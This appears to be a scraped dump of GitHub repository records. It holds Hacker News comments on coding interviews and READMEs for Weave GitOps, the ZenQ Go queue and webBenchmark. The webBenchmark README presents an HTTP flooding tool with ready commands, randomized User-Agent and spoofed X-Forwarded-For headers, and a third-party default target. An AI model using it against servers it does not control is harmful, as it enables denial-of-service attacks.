But at least I can open source them and put them and make it look like I do side projectsFor a recent interview I was asked to build an IOC dependency injection library in 2h and the task was made \u201cdeliberately\u201d unclear according to the interviewer. So I spent 2 days researching IOC libraries, building some nice examples of how it should work to get a feel for the API, writing tests up front, writing the library and adding docs. Then I got an interview! Fantastic I thought, I passed the technical with my 100% tested IOC container that had a nice interface for injecting dependencies and even options for injecting singletons or new class instances with configurations passed into the constructor.Now I went through with them some extra things in the interview and fixed some things about the code and handled some things a bit better. After this investment of time I was told I didn\u2019t handle errors well enough in this 100% coverage tested example code of a library. This in my opinion was not true or even discussed in the interview, error handling was certainly not specifically mentioned in the assignment.Anyway to address your point, I don\u2019t think you should necessarily believe what other people say about you in job interviews; there are various types of interviewer but mostly the feedback is post rationalisation of \u201cthat\u2019s not how I would have done it\u201d even if your solution solves the problem perfectly. For this reason I\u2019ve decided unless I can\u2019t afford to feed myself I will avoid doing at home coding exercises that are deliberately vague in the future.If you want to get better at in person/under pressure coding exercises I highly recommend taking on Advent of Code [1] one year, these are the opposite of the vague problem specified above as there is an exact and clear right answer to collect each star.[1] https://adventofcode.com/It's worth mentioning that the world could use a few more grug-brain developers:\nhttps://grugbrain.dev/I think you\u2019ve grouped many things into a good/bad spectrum, but in reality we\u2019re talking about different qualities of a programmer.* Productivity\n* Simplifying Complexity\n* Design\n* Knowledge\n* Documentation\n* \u2026Are all different things and it\u2019s possible to be skilled at one and not another. Someone can be great at design but slow at getting the simplest things done, another may know a computer inside and out, but write zero documentation.I applied for a job.I did a coding assignment.I was asked to read two xml files, one with data, one with operations, and perform the operations on the data.The task was deliberately unclear and suggested to not use third party software.So I did the thing and wrote an xml parser.I documented my decisions in design etc.Later I found out that one could have used any third party XML reader package.I was declined for other reasons but when asking for feedback on my code, all I got was: You did not check for divisions by zero.I am still wondering what skill they actually wanted to test with the coding assignment.I'm a quite bad bad programmer.> My code is highly readable with good comments and other can take over my code responsibility quite easilySay no more, you're hired.Sheesh, the software interview process is so messed up that it makes people wonder if they can actually do the job they already do.\"Huh, maybe I don't know how to program. 
I thought I'd been programming functioning applications professsionally all this time, but despite all evidence to the contrary, maybe not!\"The problem is with the interview process, not you. More broadly, the problem is with the industry and its incentives, not you.If I had to put my finger on it, I'd say it's the need to scale everything, including human processes like finding new team members. Nobody doubts that spending a lot of time really getting to know a programmer's strengths and weaknesses would be better, but we'd have to sacrifice a lot of throughput in the hiring process, and god forbid we do that.World needs more 1x programmers.I used to be like you. I stay on top of cpp con talks, I read Meyers and Andrescu's books and I had some fun side projects and I do fine at work, regular promotions, etc, but I did incredibly badly during interviews. I wasn't sure if it's some kind of IQ thing because I know people who can answer those CS questions without studying but I took the advice of some friends and I spent months grinding leetcode style questions. After a while something in my brain clicked and since then I've gotten a ton of job offers and worked at two FAANGs.As I read your post I recall having come to much of the same conclusions (also have a similar non traditional/institutional history - over 20yrs writing/building stuff).I went as far as to enroll in an interview prep course to try and \u201cfreshen\u201d up for an attempt to move from my current role/comp to a faang.The trainer was an ex google guy who had done a ton of interviews over the years so I took the opportunity to ask him\u2026 why?Why is the knowledge of how to implement an esoteric algorithm that I would almost never have a need to use for the job/role relevant. Why is memorization of these implementations so critical? \nI get why it\u2019s useful to understand the high level ideas/approaches but why do we need to be able to recite their implementations like the gospel?After much prodding he admitted that it ultimately boils down to the companies using these practices trying to find an \u201cunbiased\u201d means of measuring a candidate. People tend to be terrible judges of character so having some standard questions and expected solutions gives the company at least some hope of providing a way to interview and hire at scale and reduce bias (slightly).I get it now, there are (were?) so many applicants and so many interviewers that they had no time (or confidence) to try and get to know the applicants and their specific skills or what values they could add. They basically decided to punt and choose people who take the time to learn the gospel - these folks would either end up being good developers/engineers or more commonly getting put on review and fired - but they showed they had the capable to learn whatever might be needed.I get it, I do, ultimately decided that I\u2019m too old for the politics of the process (and that\u2019s kinda by design) and I\u2019d be better served ghosting comps that require this sort of thing going forward.- just a grey bearded devThere's a difference between a PROGRAMMER and SOFTWARE ENGINEER. I know bad programmers that are good swes, and I know good programmers that are bad swes. 
Though the best is probably happy average.I think something that is often forgotten is that there are highly productive programmers who have near-zero industry experience, or at least are not totally privy to \"modern\" engineering practices, and who mostly just program as a hobby (or in open-source).That being said, the standards that define what a \"good\" programmer is are not well defined, and everyone has a different idea of what it means. It is also possible to be a \"terrible\" programmer and still manage to sell two startups.I don't know if you're a good or bad programmer, but I'll tell you this about job interviews:I've given dozens of interviews over the past 3 years. I'm fairly certain everyone got out of the interview with me feeling like they did very poorly, when in fact a lot of people were doing well. All of the people I ended up hiring told me \"I was sure I completely failed your interview\".You don't know what interviewers are looking for, so don't make assumptions. I'm almost never looking for a \"correct\" answer. I'm always looking for your behavior and attitude when answering those questions. My definition of a good programmer is someone who understands that it's a team sports, who values clear communication and who knows how to read the doc on their own. You may or may not have implemented your own lisp in your spare time, but this is secondary.If you ask me to review the quality of your code, I'll spend more time reading your commit messages and variable names, than you realize. It's as important as the choice of algorithm and data structure.Other interviewers value other things. There's no one thing.TLDR: You don't know how well you did in interviews, it's very likely you're better than you think.Not quite. Learn more about Monad and Category theory then i'm sure you're really a good programmer.I'm the same way. 25 years in the industry, though I consider myself a jack of all trades. Went from Oracle development -> ASP Classic -> C# -> PHP -> NodeJS. I think I'm pretty good at getting what needs to be done, but I absolutely fail when doing tests. I know how to program, I just may not know all the terminology and what... and if I don't understand something, google is always a few clicks away. Keeps me scared of looking for new opportunities though.You're probably a very good programmer - strange that you're comparing your work against seniors; are you not a senior engineer yet with 20 years experience? You probably could be.Also, don't be so down on yourself regarding interview questions. If you spent a month or two just practicing these types of questions in your free time you'd be surprised how you'd do on some of the interviews you would normally bomb out.It's difficult for any of us to really tell how much truth is in every statement. For example readability - its difficult to asses it without looking at your code.It's nothing personal, but many developers tend to think about their skills higher than they are in reality.What i can suggest you, is to ask for feedback after interviews. 
You will get more specifics thereEDIT:\nI forgot to actually add a verb in the first sentence and some punctationI\u2019ve never got the job where they asked me to code some algorithm on the spotYour list makes the case for being \"good\", but that doesn't matter.The \"job interview questions\" are largely popularized by people who do not understand hiring, and probably don't understand much of anything else, with a cargo cult mindless copy/paste of practices that don't actually apply to them.There is a niche of a niche of a niche of roles where deep specialized knowledge is actually a baseline requirement in order to be successful in the role. 99% of the other roles filled by human beings who write software don't require anything close to it, but the companies delight in wasting everyone's time anyway.Most of the very best programmers I've ever known bomb these idiotic interviews and the companies (and their customers) lose because of it.A fine place for me to stop babbling.Wrote a comic about code interviews [0].Code interviews are broken. I judge a company's software development maturity based on their interview process. I've been the owner of such processes, and I've made the mistake of applying non-related coding exercises, but I've also had success revisiting these with new approaches.There's no formula for all companies, but the best kind of interview process, in my opinion, is to match the developer skills and personality with what you already have in-house, and with the kind of problems your tech team is facing.[0]: https://badecaf.com/5/Job interviews have a very questionable form of gatekeeping. But it is a very well documented form of gatekeeping. If you want to get good grades at job inteviews, you can practice how to pass that test... \nI do agree it doesn't reflect the quality of developer you are, but it is what it is...Requires Go 1.6 or greater. Interestingly, the \"open source\" code seems to not be viewable!Edit: you can see it here: https://github.com/golang/mobileAny example how to call android APIs like intents?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "weaveworks/weave-gitops", "link": "https://github.com/weaveworks/weave-gitops", "tags": ["gitops"], "stars": 557, "description": "Weave GitOps OSS", "lang": "Go", "repo_lang": "", "readme": "# Weave GitOps\n\n![Test status](https://github.com/weaveworks/weave-gitops/actions/workflows/pr.yaml/badge.svg)\n[![LICENSE](https://img.shields.io/github/license/weaveworks/weave-gitops)](https://github.com/weaveworks/weave-gitops/blob/master/LICENSE)\n[![Contributors](https://img.shields.io/github/contributors/weaveworks/weave-gitops)](https://github.com/weaveworks/weave-gitops/graphs/contributors)\n[![Release](https://img.shields.io/github/v/release/weaveworks/weave-gitops?include_prereleases)](https://github.com/weaveworks/weave-gitops/releases/latest)\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B19155%2Fgithub.com%2Fweaveworks%2Fweave-gitops.svg?type=shield)](https://app.fossa.com/reports/005da7c4-1f10-4889-9432-8b97c2084e41)\n\nWeave GitOps is a simple open source developer platform for people who want cloud native applications, without needing\nKubernetes expertise. Experience how easy it is to enable GitOps and run your apps in a cluster. Use git to collaborate\nwith team members making new deployments easy and secure. 
Start with what developers need to run apps, and then easily\nextend to define and run your own enterprise platform.\n\nFrom Kubernetes run Weave GitOps to get:\n\n1. Application Operations: manage and automate deployment pipelines for apps and more\n2. Platforms: the easy way to have your own custom PaaS on cloud or on premise\n3. Extensions: coordinate Kubernetes rollouts with eg. VMs, DBs and cloud services\n\nOur vision is that all cloud native applications should be easy for developers, including operations which should be\nautomated and secure. Weave GitOps is a highly extensible tool to achieve this by placing Kubernetes and GitOps at the\ncore and building a platform around that.\n\nWe use GitOps tools throughout. Today Weave GitOps defaults are Flux, Kustomize, Helm, Sops and Kubernetes CAPI. If you\nuse Flux already then you can easily add Weave GitOps to create a platform management overlay.\n\n### Manage and view applications all in one place.\n\n![Application Page](./doc/img/01-workloads.png)\n\n### Easily see your continuous deployments and what is being produced via GitOps. There are multiple views for debugging as well as being able to sync your latest git commits directly from the UI.\n\n![Reconciliation Page](./doc/img/02-workload-detail.png)\n\n### Leverage Kubernetes RBAC to control permissions in the dashboard.\n\n![Source Page](./doc/img/03-rbac.jpg)\n\n### See your entire source landscape whether it is a git repository, helm repository, or bucket.\n\n![Flux Runtime](./doc/img/04-sources.jpg)\n\n### Quickly see the health of your reconciliation deployment runtime. These are the workers that are ensuring your software is running on the Kubernetes cluster.\n\n![Flux Runtime](./doc/img/05-runtime.jpg)\n\n## Getting Started\n\n### CLI Installation\n\nMac / Linux\n\n```console\ncurl --silent --location \"https://github.com/weaveworks/weave-gitops/releases/download/v0.17.0/gitops-$(uname)-$(uname -m).tar.gz\" | tar xz -C /tmp\nsudo mv /tmp/gitops /usr/local/bin\ngitops version\n```\n\nAlternatively, users can use Homebrew:\n\n```console\nbrew tap weaveworks/tap\nbrew install weaveworks/tap/gitops\n```\n\nPlease see the [getting started guide](https://docs.gitops.weave.works/docs/getting-started).\n\n## CLI Reference\n\n```console\nCommand line utility for managing Kubernetes applications via GitOps.\n\nUsage:\n gitops [command]\n\nExamples:\n\n # Get help for gitops add cluster command\n gitops add cluster -h\n gitops help add cluster\n\n # Get the version of gitops along with commit, branch, and flux version\n gitops version\n\n To learn more, you can find our documentation at https://docs.gitops.weave.works/\n\n\nAvailable Commands:\n beta This component contains unstable or still-in-development functionality\n check Validates flux compatibility\n completion Generate the autocompletion script for the specified shell\n create Creates a resource\n get Display one or many Weave GitOps resources\n help Help about any command\n version Display gitops version\n\nFlags:\n -e, --endpoint WEAVE_GITOPS_ENTERPRISE_API_URL The Weave GitOps Enterprise HTTP API endpoint can be set with WEAVE_GITOPS_ENTERPRISE_API_URL environment variable\n -h, --help help for gitops\n --insecure-skip-tls-verify If true, the server's certificate will not be checked for validity. This will make your HTTPS connections insecure\n --kubeconfig string Paths to a kubeconfig. 
Only required if out-of-cluster.\n --namespace string The namespace scope for this operation (default \"flux-system\")\n -p, --password WEAVE_GITOPS_PASSWORD The Weave GitOps Enterprise password for authentication can be set with WEAVE_GITOPS_PASSWORD environment variable\n -u, --username WEAVE_GITOPS_USERNAME The Weave GitOps Enterprise username for authentication can be set with WEAVE_GITOPS_USERNAME environment variable\n\nUse \"gitops [command] --help\" for more information about a command.\n```\n\nFor more information please see the [docs](https://docs.gitops.weave.works/docs/references/cli-reference/gitops/)\n\n## FAQ\n\nPlease see our Weave GitOps OSS [FAQ](https://www.weave.works/faqs-for-weave-gitops)\n\n## Contribution\n\nNeed help or want to contribute? Please see the links below.\n\n- Getting Started?\n - Follow our [Get Started guide](https://docs.gitops.weave.works/docs/getting-started) and give us feedback\n- Need help?\n - Talk to us in\n the [#weave-gitops channel](https://app.slack.com/client/T2NDH1D9D/C0248LVC719/thread/C2ND76PAA-1621532937.019800)\n on Weaveworks Community Slack. [Invite yourself if you haven't joined yet.](https://slack.weave.works/)\n- Have feature proposals or want to contribute?\n - Please create a [Github issue](https://github.com/weaveworks/weave-gitops/issues)\n - Learn more about contributing [here](./CONTRIBUTING.md).\n\n## License scan details\n\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B19155%2Fgithub.com%2Fweaveworks%2Fweave-gitops.svg?type=large)](https://app.fossa.com/reports/005da7c4-1f10-4889-9432-8b97c2084e41)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alphadose/ZenQ", "link": "https://github.com/alphadose/ZenQ", "tags": ["go", "golang", "lock-free", "low-latency", "memory-efficient", "ringbuffer", "thread-safe", "zero-allocations", "highly-concurrent", "mpsc-queue", "spsc-queue", "zenq", "concurrency", "fastest", "optimization", "high-throughput"], "stars": 557, "description": "A thread-safe queue faster and more resource efficient than golang's native channels", "lang": "Go", "repo_lang": "", "readme": "# ZenQ\n\n> A low-latency thread-safe queue in golang implemented using a lock-free ringbuffer and runtime internals\n\nBased on the [LMAX Disruptor Pattern](https://lmax-exchange.github.io/disruptor/disruptor.html)\n\n## Features\n\n* Much faster than native channels in both SPSC (single-producer-single-consumer) and MPSC (multi-producer-single-consumer) modes in terms of `time/op`\n* More resource efficient in terms of `memory_allocation/op` and `num_allocations/op` evident while benchmarking large batch size inputs\n* Handles the case where NUM_WRITER_GOROUTINES > NUM_CPU_CORES much better than native channels\n* Selection from multiple ZenQs just like golang's `select{}` ensuring fair selection and no starvation\n* Closing a ZenQ\n\nBenchmarks to support the above claims [here](#benchmarks)\n\n## Installation\n\nYou need Golang [1.19.x](https://go.dev/dl/) or above\n\n```bash\n$ go get github.com/alphadose/zenq/v2\n```\n\n## Usage\n\n1. 
Simple Read/Write\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\n\t\"github.com/alphadose/zenq/v2\"\n)\n\ntype payload struct {\n\talpha int\n\tbeta string\n}\n\nfunc main() {\n\tzq := zenq.New[payload](10)\n\n\tfor j := 0; j < 5; j++ {\n\t\tgo func() {\n\t\t\tfor i := 0; i < 20; i++ {\n\t\t\t\tzq.Write(payload{\n\t\t\t\t\talpha: i,\n\t\t\t\t\tbeta: fmt.Sprint(i),\n\t\t\t\t})\n\t\t\t}\n\t\t}()\n\t}\n\n\tfor i := 0; i < 100; i++ {\n\t\tif data, queueOpen := zq.Read(); queueOpen {\n\t\t\tfmt.Printf(\"%+v\\n\", data)\n\t\t}\n\t}\n}\n```\n\n2. **Selection** from multiple ZenQs just like golang's native `select{}`. The selection process is fair i.e no single ZenQ gets starved\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\n\t\"github.com/alphadose/zenq/v2\"\n)\n\ntype custom1 struct {\n\talpha int\n\tbeta string\n}\n\ntype custom2 struct {\n\tgamma int\n}\n\nconst size = 100\n\nvar (\n\tzq1 = zenq.New[int](size)\n\tzq2 = zenq.New[string](size)\n\tzq3 = zenq.New[custom1](size)\n\tzq4 = zenq.New[*custom2](size)\n)\n\nfunc main() {\n\tgo looper(intProducer)\n\tgo looper(stringProducer)\n\tgo looper(custom1Producer)\n\tgo looper(custom2Producer)\n\n\tfor i := 0; i < 40; i++ {\n\n\t\t// Selection occurs here\n\t\tif data := zenq.Select(zq1, zq2, zq3, zq4); data != nil {\n\t\t\tswitch data.(type) {\n\t\t\tcase int:\n\t\t\t\tfmt.Printf(\"Received int %d\\n\", data)\n\t\t\tcase string:\n\t\t\t\tfmt.Printf(\"Received string %s\\n\", data)\n\t\t\tcase custom1:\n\t\t\t\tfmt.Printf(\"Received custom data type number 1 %#v\\n\", data)\n\t\t\tcase *custom2:\n\t\t\t\tfmt.Printf(\"Received pointer %#v\\n\", data)\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunc intProducer(ctr int) { zq1.Write(ctr) }\n\nfunc stringProducer(ctr int) { zq2.Write(fmt.Sprint(ctr * 10)) }\n\nfunc custom1Producer(ctr int) { zq3.Write(custom1{alpha: ctr, beta: fmt.Sprint(ctr)}) }\n\nfunc custom2Producer(ctr int) { zq4.Write(&custom2{gamma: 1 << ctr}) }\n\nfunc looper(producer func(ctr int)) {\n\tfor i := 0; i < 10; i++ {\n\t\tproducer(i)\n\t}\n}\n```\n\n## Benchmarks\n\nBenchmarking code available [here](./benchmarks)\n\nNote that if you run the benchmarks with `--race` flag then ZenQ will perform slower because the `--race` flag slows\ndown the atomic operations in golang. Under normal circumstances, ZenQ will outperform golang native channels.\n\n### Hardware Specs\n\n```\n\u276f neofetch\n 'c. alphadose@ReiEki.local\n ,xNMM. ----------------------\n .OMMMMo OS: macOS 12.3 21E230 arm64\n OMMM0, Host: MacBookAir10,1\n .;loddo:' loolloddol;. Kernel: 21.4.0\n cKMMMMMMMMMMNWMMMMMMMMMM0: Uptime: 6 hours, 41 mins\n .KMMMMMMMMMMMMMMMMMMMMMMMWd. Packages: 86 (brew)\n XMMMMMMMMMMMMMMMMMMMMMMMX. Shell: zsh 5.8\n;MMMMMMMMMMMMMMMMMMMMMMMM: Resolution: 1440x900\n:MMMMMMMMMMMMMMMMMMMMMMMM: DE: Aqua\n.MMMMMMMMMMMMMMMMMMMMMMMMX. WM: Rectangle\n kMMMMMMMMMMMMMMMMMMMMMMMMWd. Terminal: iTerm2\n .XMMMMMMMMMMMMMMMMMMMMMMMMMMk Terminal Font: FiraCodeNerdFontComplete-Medium 16 (normal)\n .XMMMMMMMMMMMMMMMMMMMMMMMMK. CPU: Apple M1\n kMMMMMMMMMMMMMMMMMMMMMMd GPU: Apple M1\n ;KMMMMMMMWXXWMMMMMMMk. Memory: 1370MiB / 8192MiB\n .cooc,. .,coo:.\n\n```\n\n### Terminology\n\n* NUM_WRITERS -> The number of goroutines concurrently writing to ZenQ/Channel\n* INPUT_SIZE -> The number of input payloads to be passed through ZenQ/Channel from producers to consumer\n\n```bash\nComputed from benchstat of 30 benchmarks each via go test -benchmem -bench=. 
benchmarks/simple/*.go\n\nname time/op\n_Chan_NumWriters1_InputSize600-8 23.2\u00b5s \u00b1 1%\n_ZenQ_NumWriters1_InputSize600-8 17.9\u00b5s \u00b1 1%\n_Chan_NumWriters3_InputSize60000-8 5.27ms \u00b1 3%\n_ZenQ_NumWriters3_InputSize60000-8 2.36ms \u00b1 2%\n_Chan_NumWriters8_InputSize6000000-8 671ms \u00b1 2%\n_ZenQ_NumWriters8_InputSize6000000-8 234ms \u00b1 6%\n_Chan_NumWriters100_InputSize6000000-8 1.59s \u00b1 4%\n_ZenQ_NumWriters100_InputSize6000000-8 309ms \u00b1 2%\n_Chan_NumWriters1000_InputSize7000000-8 1.97s \u00b1 0%\n_ZenQ_NumWriters1000_InputSize7000000-8 389ms \u00b1 4%\n_Chan_Million_Blocking_Writers-8 10.4s \u00b1 2%\n_ZenQ_Million_Blocking_Writers-8 2.32s \u00b121%\n\nname alloc/op\n_Chan_NumWriters1_InputSize600-8 0.00B\n_ZenQ_NumWriters1_InputSize600-8 0.00B\n_Chan_NumWriters3_InputSize60000-8 109B \u00b168%\n_ZenQ_NumWriters3_InputSize60000-8 24.6B \u00b1107%\n_Chan_NumWriters8_InputSize6000000-8 802B \u00b1241%\n_ZenQ_NumWriters8_InputSize6000000-8 1.18kB \u00b1100%\n_Chan_NumWriters100_InputSize6000000-8 44.2kB \u00b141%\n_ZenQ_NumWriters100_InputSize6000000-8 10.7kB \u00b138%\n_Chan_NumWriters1000_InputSize7000000-8 476kB \u00b1 8%\n_ZenQ_NumWriters1000_InputSize7000000-8 90.6kB \u00b110%\n_Chan_Million_Blocking_Writers-8 553MB \u00b1 0%\n_ZenQ_Million_Blocking_Writers-8 122MB \u00b1 3%\n\nname allocs/op\n_Chan_NumWriters1_InputSize600-8 0.00\n_ZenQ_NumWriters1_InputSize600-8 0.00\n_Chan_NumWriters3_InputSize60000-8 0.00\n_ZenQ_NumWriters3_InputSize60000-8 0.00\n_Chan_NumWriters8_InputSize6000000-8 2.76 \u00b1190%\n_ZenQ_NumWriters8_InputSize6000000-8 5.47 \u00b183%\n_Chan_NumWriters100_InputSize6000000-8 159 \u00b126%\n_ZenQ_NumWriters100_InputSize6000000-8 25.1 \u00b139%\n_Chan_NumWriters1000_InputSize7000000-8 1.76k \u00b1 6%\n_ZenQ_NumWriters1000_InputSize7000000-8 47.3 \u00b131%\n_Chan_Million_Blocking_Writers-8 2.00M \u00b1 0%\n_ZenQ_Million_Blocking_Writers-8 1.00M \u00b1 0%\n```\n\nThe above results show that ZenQ is more efficient than channels in all 3 metrics i.e `time/op`, `mem_alloc/op` and `num_allocs/op` for the following tested cases:-\n\n1. SPSC\n2. MPSC with NUM_WRITER_GOROUTINES < NUM_CPU_CORES\n3. 
MPSC with NUM_WRITER_GOROUTINES > NUM_CPU_CORES\n\n\n## Cherry on the Cake\n\nIn SPSC mode ZenQ is faster than channels by **92 seconds** for an input size of 6 * 10^8 elements\n\n```bash\n\u276f go run benchmarks/simple/main.go\n\nWith Input Batch Size: 60 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 26.916\u00b5s\nZenQ Runner completed transfer in: 20.292\u00b5s\n====================================================================\n\nWith Input Batch Size: 600 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 135.75\u00b5s\nZenQ Runner completed transfer in: 105.792\u00b5s\n====================================================================\n\nWith Input Batch Size: 6000 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 2.100209ms\nZenQ Runner completed transfer in: 510.792\u00b5s\n====================================================================\n\nWith Input Batch Size: 6000000 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 1.241481917s\nZenQ Runner completed transfer in: 226.068209ms\n====================================================================\n\nWith Input Batch Size: 600000000 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 1m55.074638875s\nZenQ Runner completed transfer in: 22.582667917s\n====================================================================\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "maintell/webBenchmark", "link": "https://github.com/maintell/webBenchmark", "tags": [], "stars": 557, "description": "a simple tool of website benchmark.", "lang": "Go", "repo_lang": "", "readme": "# webBenchmark\nAn HTTP benchmark tool to max out your server's bandwidth.\n\nBefore using this tool, please read the license and disclaimer below. webBenchmark is merely a tool for testing web server performance; any other use is at your own risk.\n\n- random User-Agent on every request\n- customizable Referer URL\n- customizable headers\n- as many concurrent routines as you wish, depending on your server's performance\n- HTTP POST mode\n- specify multiple target IPs, or let them be resolved by the system DNS\n- randomized X-Forwarded-For and X-Real-IP headers (default on)\n\n# Todo\n- automatically tune concurrent routines to gain maximum performance.
\n- support non-standard ports in the address when specifying a target IP.\n- subscribe to benchmark tasks from a remote server.\n\n# Usage\n webBenchmark -c [COUNT] -s [URL] -r [REFERER]\n -c int\n concurrent routines for download (default 16)\n -r string\n referer url\n -s string\n target url (default \"https://baidu.com\")\n -i string\n custom ip address for that domain, multiple addresses automatically will be assigned randomly\n -H http header pattern\n http header pattern, use Random with number prefix will generate random string, same key will be overwritten\n -f string\n randomized X-Forwarded-For and X-Real-IP address\n -p string\n post content\n\n# Linux\n wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64\n chmod +x webBenchmark_linux_x64\n ./webBenchmark_linux_x64 -c 32 -s https://target.url\n\n## Advanced example\n # send request to 10.0.0.1 and 10.0.0.2 for https://target.url with 32 concurrent threads \n # and the referer is https://refer.url \n ./webBenchmark_linux_x64 -c 32 -s https://target.url -r https://refer.url -i 10.0.0.1 -i 10.0.0.2\n # send request to https://target.url with header regid:123 and sign:Random10\n ./webBenchmark_linux_x64 -s https://target.url -H 'regid:123' -H 'sign:QpXDYHdVzB'\n \n\n\n\n## LICENSE AND DISCLAIMER\n\n\n**1. Application.**\n\nPlease read this document carefully before using, accessing, downloading, installing or otherwise operating the webBenchmark as defined hereafter.\n\nUsing, accessing, downloading or otherwise operating any of the webBenchmark constitutes an unconditional agreement by You to be bound by the following terms and conditions for the time of Using the webBenchmark and thereafter.\n\nIF YOU DO NOT ACCEPT THE TERMS OF THIS LICENSE AGREEMENT, YOU ARE PROHIBITED FROM USING ANY OF THE webBenchmark.\n\n**2.
Definitions.**\n\n**\"webBenchmark\"** shall mean any of the documents, description, explanations, presentations, media types, all schedules, appendixes and related documentation, software in object or source code, including Updates provided on this Platform by Licensor for Your Use.\n\n**\"Derivative Works\"** means any modification, change, adaptations, contributions, enhancements, customization, modifications, inventions, developments, improvements of the Date Product by you and not developed by Licensor or integrated into the Date Product by Licensor.\n\n**\"Intellectual Property Rights\"** means any intellectual property and proprietary rights, including , but not limited to, copyrights, moral rights, works of authorship, trade and service marks, trade names, rights in logos and get-up, inventions and discoveries, and Know-How, registered designs, design rights, patents, utility models, all rights of whatsoever nature in computer software and data, source code, database rights all intangible rights and privileges of nature similar or allied to any of the foregoing, in every case in any part of the world and whether or not registered; and including all granted registrations and all applications for registration, all renewals, reversions or extensions, the right to sue for damages for past infringement and all forms of protection of a similar nature which may subsist anywhere in the world.\n\n**\"Know-How\"** means any information relating to commercial, scientific and technical matters, inventions and trade secrets, including but not limited to any patentable technical or other information which is not in the public domain including information comprising or relating to concepts, discoveries, data, designs, formulae, ideas, reports and data analyses.\n\n**\"License\"** shall mean this license and disclaimer document and its terms and conditions for use, reproduction, and distribution as provided in this document.\n\n**\"Licensor\"** shall mean the copyright owner or entity authorized by the copyright owner that is granting the License, meaning maintell, and its successors and assigns.\n\n**\"Parties\"** means both You and Licensor.\n\n**\"Party\"** means You or Licensor individually.\n\n**\"Platform\"** means the maintell GitHub account and related repositories available at https://github.com/maintell.\n\n**\"Purpose\"** means using or integrating the webBenchmark free of charge for the purpose of using and integrating benchmarking on a website, whereby examples are provided in the webBenchmark to demonstrate specific features.\n\n**\"SDK\"** means a software development kit which is a set of software development tools that allows the creation of applications for a certain software package, video service platforms, software framework, or similar development platform.\n\n**\"maintell\"** means a set of tools written and developed by the Licensor that provides support for benchmark and related functionalities for HTTP including any related software, source and object code, deliverables, technology and related resources and relevant documentation provided and/or created, made available, license and/or sold to you and developed by Licensor in connection with separate license terms and conditions.\n\n**\"Use\"** means using, accessing, downloading, installing or otherwise operating or using the webBenchmark as part of Your self-service and subject to clause titled \"LICENSE\" and in connection with the Purpose of this License and its terms and conditions.\n\n**\"Updates\"** means all 
updates, modifications and releases of new versions of webBenchmark containing improvements, corrections, minor modifications, bug fixes, patches, or the like that have been added to the Platform by the Licensor.\n\n\"**You\" (or \"Your\")** shall mean an individual or legal entity exercising permissions granted by this License.\n\n**3. License**\n\nSubject to the terms and conditions of this License, Licensor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, right to reproduce, prepare Derivative Works of, sublicence, make, have made, use, import the webBenchmark and the Derivative Works as required for the Purpose and subject to the terms and conditions as described in the Date Products.\n\nExcept as otherwise agreed by Licensor in writing in separate license terms and conditions for the use of maintell, You shall not distribute, relicense, sell, lease, transfer, encumber, assign or make available for public use the webBenchmark. Any attempt to take any such actions is void and will automatically terminate Your rights under this License.\n\nIf the webBenchmark or your Use (allegedly) constitutes a direct or contributory infringement, then any\n\nrights granted to You under this License for that webBenchmark shall terminate immediately.\n\nUnless agreed by Parties in writing or if the enforcement of this provision is prohibited by applicable law, You shall not under any circumstances attempt, or knowingly cause or permit others to attempt to modify, adapt, port, merge, decompile, disassemble, reverse engineer, decipher, decrypt or otherwise discover the source code or any other parts of the mechanisms and algorithms used by webBenchmark nor remove restrictions or create derivative works of webBenchmark or of any part of webBenchmark.\n\n**4. Support**\n\nThe Licensor has no obligation under this License to provide any maintenance, support or training to You.\n\n**5. Update**\n\nThe Licensor may at any time, at its discretion provide Updates to the webBenchmark. The Licensor has, however, no obligation whatsoever under this License to provide Updates, modify or release new versions of the webBenchmark.\n\n**6. Submission of Contributions**\n\nAny contribution submitted for inclusion in the webBenchmark by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Such inclusion shall be subject to Licensor's discretion. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such contributions.\n\n**7. Trademarks.**\n\nThis License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the webBenchmark and related copyright notices.\n\n**8. Intellectual Property**\n\nYou recognize that all rights, title and interests in and to any and all worldwide Intellectual Property Rights related to the webBenchmark shall remain the property of Licensor or its suppliers. 
Unless otherwise agreed upon between the Parties, any Intellectual Property Rights in any Updates, contributions, enhancements, customization, modifications, inventions, developments, improvements thereof of any kind to, in, or that otherwise relate to the webBenchmark, including any Derivative Work or results of agreed services during, before or after the term of this License, either specific to You, Your customer or in general in connection with this License or arising out of the business relationship between the Parties shall solely and exclusively belong to or be transferred to Licensor through assignment, entitlement or otherwise, including the entire right, title and interest. For this purpose, Licensor shall also have the right to file and prosecute at its own expenses any patent application on the same above, in any country, region or jurisdiction in the world in its own name or on behalf of You, as the case may be. You shall not have the right to claim and will not undertake or try to obtain, register or apply for any Intellectual Property Rights or other rights in or to the webBenchmark or Derivative Works anywhere in the world. You shall not do anything that might misrepresent, change or otherwise compromises the ownership or proprietary rights of Licensor or its suppliers under this License. You shall not take any actions that would amount to an exhaustion of Licensor's or its suppliers Intellectual Property Rights. The webBenchmark may contain the logo and copyright notice of Licensor. It is prohibited to remove or modify the copyright notice and webBenchmark logo of Licensor.\n\n**9. Disclaimer of Warranty.**\n\nUnless required by applicable law or agreed by the Parties in writing, Licensor provides the webBenchmark AND any RELATEd SERVICE on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, STATUTORY OR OTHERWISE, including, without limitation, any warranties or conditions of THE webBenchmark ACCURACY, 